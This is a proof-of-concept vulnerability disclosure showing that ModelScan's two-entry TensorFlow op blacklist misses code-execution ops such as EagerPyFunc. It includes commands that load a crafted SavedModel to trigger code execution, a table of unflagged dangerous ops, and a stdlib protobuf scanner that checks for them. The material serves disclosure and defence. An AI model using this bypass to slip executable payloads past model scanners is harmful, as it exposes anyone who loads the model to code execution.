# ModelScan TF Ops Blacklist Bypass (PoC)
## What This Is

ModelScan's `unsafe_tf_operators` blacklist has only two entries: `ReadFile` and `WriteFile`.

TensorFlow, however, exposes hundreds of raw ops, including code-execution ops such as `EagerPyFunc` and `PyFunc`. None of them is flagged by ModelScan.

This SavedModel contains `EagerPyFunc` ops, yet ModelScan reports 0 Issues, 0 Errors, 0 Skipped.
## Verify

```bash
# 1. ModelScan says CLEAN
pip install modelscan[all]
modelscan -p saved_model.pb
# Output: Issues: 0, Errors: 0, Skipped: 0

# 2. But the graph contains EagerPyFunc
python3 -c "
data = open('saved_model.pb', 'rb').read()
print(f'EagerPyFunc: {data.count(b\"EagerPyFunc\")}x')
print(f'StatefulPartitionedCall: {data.count(b\"StatefulPartitionedCall\")}x')
"

# 3. Load + call -> RCE
python3 -c "
import tensorflow as tf
model = tf.saved_model.load('.')
print(model(tf.constant([1.0, 2.0, 3.0])))
print('Check /tmp/PYFUNC_RCE')
"
```
## Dangerous Ops NOT in Blacklist

| Op | Risk | In Blacklist? |
|---|---|---|
| EagerPyFunc | Code execution | No |
| PyFunc | Code execution | No |
| PyFuncStateless | Code execution | No |
| StatefulPartitionedCall | Calls sub-function | No |
| PartitionedCall | Calls sub-function | No |
| WholeFileReader | File read | No |
| WholeFileReaderV2 | File read | No |
| MatchingFiles | Directory listing | No |
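The defensive counterpart to the table above, added here as an example that is not part of this PoC or of ModelScan: a stdlib-only scanner that walks the serialized protobuf and counts `NodeDef.op` values (field 2) on an expanded deny-list, so that ops outside the two-entry blacklist are surfaced before a SavedModel is loaded. The sample model bytes are constructed inline from three hand-built NodeDefs, and nested messages are located by trial parsing rather than a schema-driven decode.

```python
# Deny-list drawn from the table above; ModelScan's own unsafe_tf_operators list stops at ReadFile and WriteFile.
DANGEROUS_OPS = {"ReadFile", "WriteFile", "EagerPyFunc", "PyFunc", "PyFuncStateless", "StatefulPartitionedCall",
                 "PartitionedCall", "WholeFileReader", "WholeFileReaderV2", "MatchingFiles"}

def _read_varint(buf, pos):
    """Decode a base-128 varint at pos -> (value, new_pos); raises IndexError if truncated."""
    value, shift = 0, 0
    while True:
        b = buf[pos]
        value, pos, shift = value | (b & 0x7F) << shift, pos + 1, shift + 7
        if not b & 0x80:
            return value, pos

def _fields(buf):
    """Yield (field_number, wire_type, payload) for the top-level fields of one protobuf message."""
    pos = 0
    while pos < len(buf):
        tag, pos = _read_varint(buf, pos)
        num, wire = tag >> 3, tag & 7
        if wire == 0:                                   # varint
            val, pos = _read_varint(buf, pos)
        elif wire in (1, 2, 5):                         # 64-bit, length-delimited, 32-bit
            n, pos = _read_varint(buf, pos) if wire == 2 else ({1: 8, 5: 4}[wire], pos)
            val, pos = buf[pos:pos + n], pos + n
        else:
            raise ValueError("unsupported wire type")   # groups or garbage: not a message
        yield num, wire, val

def find_dangerous_ops(pb_bytes):
    """Walk nested messages by trial parsing; count NodeDef.op (field 2) values on the deny-list."""
    found = {}
    try:
        for num, wire, val in _fields(pb_bytes):
            if wire == 2:                               # string, bytes, or an embedded message
                op = val.decode("ascii", "replace")
                if num == 2 and op in DANGEROUS_OPS:    # NodeDef.op is field 2
                    found[op] = found.get(op, 0) + 1
                for op, n in find_dangerous_ops(val).items():  # descend in case it is a message
                    found[op] = found.get(op, 0) + n
    except (IndexError, ValueError):
        pass  # payload was a plain string/bytes field, not a message: nothing to descend into
    return found

def sample_saved_model():
    """Constructed SavedModel bytes: meta_graphs(2) > graph_def(2) > node(1){name(1), op(2)}."""
    ld = lambda num, payload: bytes([num << 3 | 2, len(payload)]) + payload  # all lengths < 128 here
    nodes = [("x", "Placeholder"), ("EagerPyFunc", "EagerPyFunc"), ("call", "StatefulPartitionedCall")]
    graph = b"".join(ld(1, ld(1, n.encode()) + ld(2, o.encode())) for n, o in nodes)
    return ld(2, ld(2, graph))
```

Run it on a real artifact with `find_dangerous_ops(open('saved_model.pb', 'rb').read())`; because nested messages are found by trial parsing, binary tensor content can occasionally parse as a message, so treat hits as a triage signal and confirm with TensorFlow's own GraphDef parser.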
## Disclosure

Submitted to ProtectAI via huntr.dev.